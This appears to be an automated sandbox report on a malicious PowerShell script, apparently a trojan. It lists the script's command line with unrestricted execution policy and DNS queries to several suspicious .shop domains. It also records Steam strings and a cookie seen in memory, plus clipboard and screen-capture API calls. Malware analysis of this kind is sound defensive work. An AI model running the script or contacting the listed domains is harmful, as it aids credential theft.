Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=2024d900d679cdf7322efb94; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 11 Jan 2025 09:03:03 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: letterdrive.shop
Source: global traffic	DNS traffic detected: DNS query: soundtappysk.shop
Source: global traffic	DNS traffic detected: DNS query: femalsabler.shop
Source: global traffic	DNS traffic detected: DNS query: apporholis.shop
Source: global traffic	DNS traffic detected: DNS query: crowdwarek.shop
Source: global traffic	DNS traffic detected: DNS query: versersleep.shop
Source: global traffic	DNS traffic detected: DNS query: chipdonkeruz.shop
Source: global traffic	DNS traffic detected: DNS query: handscreamny.shop
Source: global traffic	DNS traffic detected: DNS query: robinsharez.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2090622151.000001BF22481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2090622151.000001BF22481000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2090622151.000001BF2362D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 00000000.00000002.2109701517.000001BF32611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2090622151.000001BF23F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2090622151.000001BF23D1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegSvcs.exe, 00000003.00000002.2109016841.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/h
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegSvcs.exe, 00000003.00000002.2109373045.0000000000C36000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2109016841.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: RegSvcs.exe, 00000003.00000002.2106289136.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegSvcs.exe, 00000003.00000002.2109848982.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_004367F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004367F0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_004367F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,

3_2_00436980

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848CE5190	0_2_00007FF848CE5190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848CEA610	0_2_00007FF848CEA610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848DB0FB6	0_2_00007FF848DB0FB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408880	3_2_00408880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040B2B0	3_2_0040B2B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00419840	3_2_00419840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406850	3_2_00406850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00427860	3_2_00427860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00427070	3_2_00427070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043B870	3_2_0043B870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406000	3_2_00406000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043080E	3_2_0043080E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043F820	3_2_0043F820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041D0C0	3_2_0041D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004418A0	3_2_004418A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041194F	3_2_0041194F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043F150	3_2_0043F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042B170	3_2_0042B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00403900	3_2_00403900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00425100	3_2_00425100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00439923	3_2_00439923
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00427133	3_2_00427133
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00433930	3_2_00433930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004121DB	3_2_004121DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042A9F7	3_2_0042A9F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E9B0	3_2_0040E9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041825B	3_2_0041825B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042EA62	3_2_0042EA62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040CA62	3_2_0040CA62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00442A60	3_2_00442A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041DAD0	3_2_0041DAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00429ADE	3_2_00429ADE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00425AF0	3_2_00425AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004092A0	3_2_004092A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00405AB0	3_2_00405AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004042B0	3_2_004042B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043CB40	3_2_0043CB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042EB5F	3_2_0042EB5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408360	3_2_00408360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00428B67	3_2_00428B67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00437B69	3_2_00437B69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402B20	3_2_00402B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441B20	3_2_00441B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00432B24	3_2_00432B24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004063C0	3_2_004063C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042DBF0	3_2_0042DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00422380	3_2_00422380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041BBA0	3_2_0041BBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042BBA0	3_2_0042BBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042EBA1	3_2_0042EBA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042EBB3	3_2_0042EBB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441BB0	3_2_00441BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441C40	3_2_00441C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00442470	3_2_00442470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00426C76	3_2_00426C76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041D400	3_2_0041D400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C400	3_2_0041C400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00417405	3_2_00417405
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00414C20	3_2_00414C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00432426	3_2_00432426
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00428437	3_2_00428437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043443D	3_2_0043443D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004354C4	3_2_004354C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00434CEF	3_2_00434CEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043A4EF	3_2_0043A4EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004374AB	3_2_004374AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041DCB0	3_2_0041DCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043ACB0	3_2_0043ACB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042FCBC	3_2_0042FCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040D545	3_2_0040D545
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00425D6A	3_2_00425D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00435D13	3_2_00435D13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00442D20	3_2_00442D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043CD27	3_2_0043CD27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00420D90	3_2_00420D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043C5A0	3_2_0043C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00421E70	3_2_00421E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00436610	3_2_00436610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407620	3_2_00407620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040AE30	3_2_0040AE30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041F6D0	3_2_0041F6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00416ED0	3_2_00416ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041BEE1	3_2_0041BEE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402EF0	3_2_00402EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004186FC	3_2_004186FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00423EFF	3_2_00423EFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00431E8E	3_2_00431E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041A690	3_2_0041A690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00415720	3_2_00415720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041AF24	3_2_0041AF24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00427F30	3_2_00427F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040DFE2	3_2_0040DFE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004257E0	3_2_004257E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00429FE4	3_2_00429FE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040CFEC	3_2_0040CFEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00409790	3_2_00409790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004427B0	3_2_004427B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441FB0	3_2_00441FB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00414C10 appears 116 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00408170 appears 45 times

Source: classification engine

Classification label: mal100.troj.evad.winPS1@4/5@10/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

3_2_0043B870

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjmy13bq.q3t.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 176.113.115.170_3.ps1

Virustotal: Detection: 35%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170_3.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
